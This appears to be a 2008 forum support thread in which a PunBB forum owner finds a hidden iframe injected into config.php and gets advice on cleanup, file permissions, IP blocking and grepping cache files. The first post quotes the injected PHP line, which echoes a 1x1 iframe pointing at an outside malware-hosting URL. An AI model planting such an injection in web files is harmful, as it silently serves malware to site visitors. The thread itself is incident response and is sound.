Topic: Punbb hacked???

Today my forum is completely blank. A blank page appear if you try to access it.

Reading your forum I've checked the file config.php and this is the content (some data are masked)

<?php

$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'xxxxxx';
$db_username = 'xxxxxx';
$db_password = 'xxxxxx';
$db_prefix = 'pun_';
$p_connect = false;

$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'bceb1676';

define('PUN', 1);<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

What I've to do? What happened? I'm running the latest version of punbb...

2 (edited by shiftsrl 2008-04-10 10:27)

Re: Punbb hacked???

I've deleted the iframe and now the forum works but my question is. How they do that? And what is the right content of config.php?

Re: Punbb hacked???

what was the config.php file CHMOD set to 777???

Sorry. Unactive due to personal life.

Re: Punbb hacked???

I don't know before, but now is set to 444

Re: Punbb hacked???

Looks like they've intrude into the server using another account and looked for a file with write permissions.
Not a punbb vulnerability, but certainly something to be aware of and careful about.

Re: Punbb hacked???

Our friends from Ukraine have been busy. It might be handy to put 85.255.112.0/20 into your .htaccess blocklist.

Re: Punbb hacked???

I've noticed that all the files in the cache folder has the iframe trojan. Problem is that these files are recreated from withinn punbb I think so how can I avoid this?

tanks

8

Re: Punbb hacked???

include/cache.php generates the cache files. If you're on a *nix system, just do a quick grep of the forum dir for <iframe, to check it's nowhere else.